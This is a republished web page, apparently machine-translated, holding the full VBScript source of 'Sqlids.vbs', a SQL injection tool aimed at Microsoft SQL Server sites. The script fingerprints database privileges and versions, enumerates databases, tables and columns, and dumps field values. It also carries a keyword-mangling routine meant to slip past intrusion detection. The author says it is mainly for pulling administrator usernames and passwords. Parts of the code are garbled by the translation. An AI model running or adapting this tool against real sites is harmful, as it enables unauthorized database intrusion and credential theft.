Sqlids.vbs 0.7 (final version, later into GUI interface) _vbs

Source: Internet
Author: User
Tags chr urlencode
There is a problem with that.
First, good judgment should be used.
Second, I use the loop plus return result is greater than 30 length to exit the loop, I believe that there is no table name and field name is greater than 30 letters, but the field value may be greater than, this place is not good enough to solve. But it is generally used to check the background of the Administrator's username and password, so give up.
Copy Code code as follows:

Set arg=wscript.arguments

If (LCase right (wscript.fullname,11) = "Wscript.Exe") Then
Wscript.Quit
End If
If Arg.count=0 Then
Usage ()
Wscript.Quit
End If

Sub usage ()
Wsh.echo String (79, "*")
Wsh.echo "For the moment only support MSSQL error mode, direct write URL for digital, write URL ' for character type, URL has & please enclose URL in double quotes"
Wsh.echo "Sqlids v0.7 for mssql2000 with error by LCX"
Wsh.echo "The following two scripts can refer to each other"
Wsh.echo "Http://www.jb51.net/article/14172.htm"
Wsh.echo "Http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html"
Wsh.echo "Usage:"
Wsh.echo "cscript" &wscript.scriptname& "URL Limit | | -----------> Get current Permissions "&vbcrlf&" Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 Limit "
Wsh.echo "cscript" &wscript.scriptname& "URL dbname | | -----------> Get all library name "&vbcrlf&" Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname "
Wsh.echo "cscript" &wscript.scriptname& "URL Table Library name | | --------> Get all table name "&vbcrlf&" Ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 Table of the given library
Master
Wsh.echo "cscript" &wscript.scriptname& "URL filed library Name Table name | | ----------> Get all the Fields "&vbcrlf&" Ex:cscript sql.vbs http://ww.x.com/1.asp for the table given to the library?
Id=1 filed Master Spt_server_info "
Wsh.echo "cscript" &wscript.scriptname& "url result field name Library Name Table name | | ---> The field value of the Library, table, field "&vbcrlf&" Ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 result ID Master sysinfo "
Wsh.echo "cscript" &wscript.scriptname& "URL search the field name you are looking for | | ---> Search fields by keyword "&vbcrlf&" ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 Search
Pass
Wsh.echo string (+, "*") &vbcrlf
End Sub


Function Gethttppage (Path)
t = GetBody (Path)
Gethttppage = Bytestobstr (t, "GB2312")
End Function

Function UrlEncode (str)
str = Replace (str, "", "%20")
UrlEncode = str
End Function

Function getbody (URL) ' XML gets the Web page source, can be changed to cookies or get submitted
On Error Resume Next
Aurl=split (URL, "?") ' This is submitted for post.
Set retrieval = CreateObject ("Microsoft.XMLHTTP")
With retrieval
. Open "Post", Aurl (0), False, "", ""
. setRequestHeader "Content-type", "application/x-www-form-urlencoded"
. setRequestHeader "Accept-encoding", "gzip, deflate"
. setRequestHeader "User-agent", "mozilla/4.0" (compatible; MSIE 7.0; Windows NT 6.0; SLCC1. NET CLR 2.0.50727; Media Center PC 5.0. NET CLR
3.0.04506. NET CLR 1.1.4322) "
. setRequestHeader "Connection", "keep-alive"
. setRequestHeader "Cache-control", "No-cache"
. Send UrlEncode (Aurl (1)) ' Post submitted
GetBody =. Responsebody
. Abort
End With
Set retrieval = Nothing
End Function


Function bytestobstr (body, Cset)
Dim objstream
Set objstream = CreateObject ("ADODB.stream")
Objstream. Type = 1
Objstream. Mode = 3
Objstream. Open
Objstream. Write body
Objstream. Position = 0
Objstream. Type = 2
Objstream. Charset = Cset
Bytestobstr = objstream. ReadTExt
Objstream. Close
Set objstream = Nothing
End Function


Function Replacekeyword (Value) ' Bypass IDs
Table = "select->se%lect| [k]|insert->in%sert| [k]|update->u%pdate| [k]|delete->dele%te| [k]|drop->dr%op| [k]|alter->al%ter| [k]|create->crea%te| [k]|inner->in%
ner| [k]|join->jo%in| [k]|from->fro%m| [k]|where->w%here| [k]|union->unio%n| [k]|group->grou%p| [k]|by->b%y| [K]|having->hav%ing| [k]|table->tab%le| [k]|shutdown-
>shu%tdown| [k]|kill->k%ill| [k]|declare->dec%lare| [k]|open->o%pen| [k]|pwdencrypt->pwdencr%ypt| [k]|msdasql->m%sdasql| [k]|sqloledb->sqlo%ledb| [k]|char->c%har|
[k]|fetch->fe%tch| [k]|next->ne%xt| [k]|allocate->al%locate| [k]|sys->s%ys| [k]|raiserror->raiser%ror| [k]| exec->e%xec| [k]|=!->=%!| [K]|--->-%-|[k]|xp_->x%p_| K
|sp_->s%p_| [K]|and->a%nd]
Dim I, Relpacement, Temp
Relpacement = Split (Table, "|[ K]| ")
Replacekeyword = Value
For i = 0 to UBound (relpacement)
Temp = Split (Relpacement (i), "->")
If UBound (temp) = 1 Then Replacekeyword = Replace (Replacekeyword, temp (0), temp (1))
NExt
End Function


Function result (shtmltemp) ' use varchar to do key words to separate the content of the Web page, with a handsome little, unfortunately not very
ahtml = Split (shtmltemp, "varchar")
If (UBound (ahtml) > 0) Then
Shtmltemp = ahtml (1)
ahtml = Split (shtmltemp, "'")
Shtmltemp = ahtml (1)
End If
Result=shtmltemp
End Function

function Str2hex (strhex) ' SQL 16-binary conversion functions
Dim ShEx
For i = 1 to Len (Strhex)
ShEx = ShEx & HEx (ASC (Mid strhex,i,1)) & "00"
NExt
Str2hex = "0x" &shex
End Function

function Str2hextwo (strhex) ' SQL 16-binary conversion functions
Dim ShEx
For i = 1 to Len (Strhex)
ShEx = ShEx & HEx (ASC (strhex,i,1))
NExt
Str2hextwo = "0x" &shex
End Function


Function MoveR (RSTR) ' to repeat
Dim I,spstr
Spstr = Split (Rstr, ",")
For i = 0 to Ubound (SPSTR)
If I = 0 Then
MoveR = MoveR & Spstr (i) & ","
Else
If InStr (Mover,spstr (i)) =0 and I=ubound (SPSTR) Then
MoveR = MoveR & Spstr (i)
Elseif InStr (Mover,spstr (i)) =0 Then
MoveR = MoveR & Spstr (i) & ","
End If
End If
NExt
End Function


function page (SQL)
Page=replace (Gethttppage (url& "" &replacekeyword (SQL)), CHR (34), "" "
End Function

Url=arg (0)

Injection =arg (1)


'--------------------------------------The following code is an injection statement that doesn't require quotes at all
Select Case ARG (1)

Case "Limit"
Body=replace (gethttppage (URL), Chr (34), "")
The statement is presented separately to facilitate later modification, the first is SA, and the second one is db_owner
Sqlone= "and" (select Is_srvrolemember (0x730079007300610064006d0069006e00)) >0--"
Sqltwo= "and" (select Is_member (0x640062005f006f0077006e0065007200)) >0--"
Bodyone=page (Sqlone)
Bodytwo=page (Sqltwo)
Wsh.echo "Current information:"
If Len (body) =len (bodyone) Then Wsh.echo "SA"

If Len (body) =len (bodytwo) and Len (body) <>len (Bodyone) Then
Wsh.echo "db_owner"
Else
Wsh.echo "Public"
End If

Sqlthtree= "and @ @servername >0--|and @ @version >0--|and user>0--|and db_name () >0--"
Rtemp=split (Sqlthtree, "|")
Servername=result (page (rtemp (0)))
Version=result (Page (rtemp (1)))
User=result (Page (Rtemp (2)))
Db_name=result (Page (Rtemp (3)))
Wsh.echo "ServerName:" &servername
Wsh.echo "version:" &version
Wsh.echo "User:" & user
Wsh.echo "db_name:" & db_name

Case "DBName"
I=1
Todo
Sql= "and Db_name (" &i& ") >0--" ' Bauku name statement
BODY = page (SQL)
K=instrrev (Body, "varchar",-1, 0)
I=i+1
If k<>0 Then
WScript.Echo Result (Body)
Else
Wsh.echo "========over============"
End If
Loop Until k=0

Case "Table"
I=1
Todo
' Table name statement AGR (2) represents the library
Sql= "and 0<> (select top 1 name from" &arg (2) & ". Dbo.sysobjects where xtype=0x7500 and name isn't in (select top "& I &" name from "&arg (2) &". dbo.sysobjects
where xtype=0x7500))--"
BODY = page (SQL)
K=instrrev (Body, "varchar",-1, 0)
I=i+1
If k<>0 Then
WScript.Echo Result (Body)
Else
Wsh.echo "========over============"
End If
Loop Until k=0

Case "filed"
Sqlbiaoid= "an%d (se%l%e%c%t to%p 1 ca%st (id as Nvarch%ar ())%2bch%ar (124) Fr%om [" &arg (2) &] ... [Sy%sob%je%cts] Wh%ere name= "&str2hex (ARG (3)) &") =0--
"
Biaoid=result (page (sqlbiaoid))
Biaoid=replace (BIAOID,CHR (124), "")
Sqlclounmcnt= "an%d (se%l%e%c%t ca%st (Co%unt (1) as Varch%ar)%2bch%ar (a) Fr%om [" &arg (2) & "]. [Sys%columns] wh%ere id= "&biaoid&") =0--"
K=replace (page (sqlclounmcnt), CHR (94), "")
Wsh.echo "common column name" &k& "a"
For I=1 to K
Sqlfiled= "an%d (se%l%e%c%t to%p 1 ca%st (name as Varch%ar (8000)) Fr%om (se%l%e%c%t to%p" &i& "Colid,name Fr%om [" & Amp;arg (2) & "]. [Sys%columns] Wh%ere
Id= "&biaoid&" ORDER by Colid) T ORDER by colid DESC) =0--"
Wsh.echo result (page (sqlfiled))
NExt


Case "Result"

I=1
Sqlcloum= "and (select CAST (count (1) as Varch%ar (8000))%2bchar from [" &arg (3) &] ... ["&arg (4) &"] where 1=1) >0--"' The total number of statements of the burst column
K=result (page (Sqlcloum))
K=replace (K,CHR (94), "")
Wsh.echo Arg (2) & "field Total Records" &k& "&vbcrlf"
For I=1 to K
Sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st (" &arg (2) & "as Varch%ar)%2bch%ar () Fr%om (se%l%e%c%t to%p" &i&amp ;" ["&arg (2) &"] Fr%om ["&arg (3) &"] ... ["&arg (4)
& "] Wh%ere 1=1 ORDER BY [" &arg (2) & "]) T wh%ere 1=1 ORDER BY [" &arg (2) & "] desc) =0--"
BODY = page (Sqlneirong)
WScript.Echo Replace (Result (body), CHR (94), "")
Next


Case "Search"
Love=str2hextwo (ARG (2))
WScript.Echo "Please wait, you are looking for, for the moment only 10, the result appears as ' Table name | field name ' format '
Timespend = Timer
For I=1 to 10 ' can change this 10 as needed
Sqlsearch= "and (select/* */top/* */1/* */t_name%2bchar (124)%2bc_name/* */from/* * * (select/* */top/*/" &i& "* * /object_name (ID)/* */as/* */t_name,name/*
*/as/* */c_name/* */from/* */syscolumns/* */where/* */charindex (CAST ("&love&"/* */as/* */varchar ()), name %3e0/* */and/* */left (name,1)!=0x40/* */order/*
*/by/* */t_name/* */ASC)/* */as/* */t/* */order/* */by/* */t_name/* */desc) >0--"
BODY = page (sqlsearch)
Body=result (body)
a=a&body& ","
NExt
Timespend = Round (timer-timespend,2)
Wsh.echo MoveR (a)
Wsh.echo "When:" & Timespend & "seconds."




Case Else
If Arg (1) <> "Limit" or arg (1) <> "dbname" or arg (1) <> "search" or arg (1) <> "table" or arg (1) <> "Filed" Then
WScript.Echo "Note Parameters"
Usage ()
End If
End Select


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.